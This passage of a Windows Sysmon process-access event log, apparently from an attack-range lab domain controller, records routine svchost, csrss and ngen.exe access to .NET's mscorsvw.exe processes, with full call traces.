07:01:08.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-00101BE80B00}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.762\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010B7EB0B00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.762","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010B7EB0B00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.762\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010B7EB0B00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.762","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010B7EB0B00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010B7EB0B00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010B7EB0B00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.809\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001039EF0B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.809","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001039EF0B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.809\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001039EF0B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.809","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001039EF0B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.809\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001039EF0B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.809","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001039EF0B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.840\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010A1F20B00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.840","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010A1F20B00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.e